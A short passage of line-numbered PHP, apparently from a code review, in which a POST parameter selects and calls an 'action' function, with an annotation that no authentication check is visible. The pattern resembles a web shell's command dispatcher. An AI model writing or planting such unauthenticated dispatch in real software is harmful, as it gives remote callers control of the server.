        // it. Any authentication gate is not visible in this chunk - confirm
        // against the earlier part of the file.
  1541. if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
  1542. call_user_func('action' . $_POST['a'])
  1543.  
  1544. ?>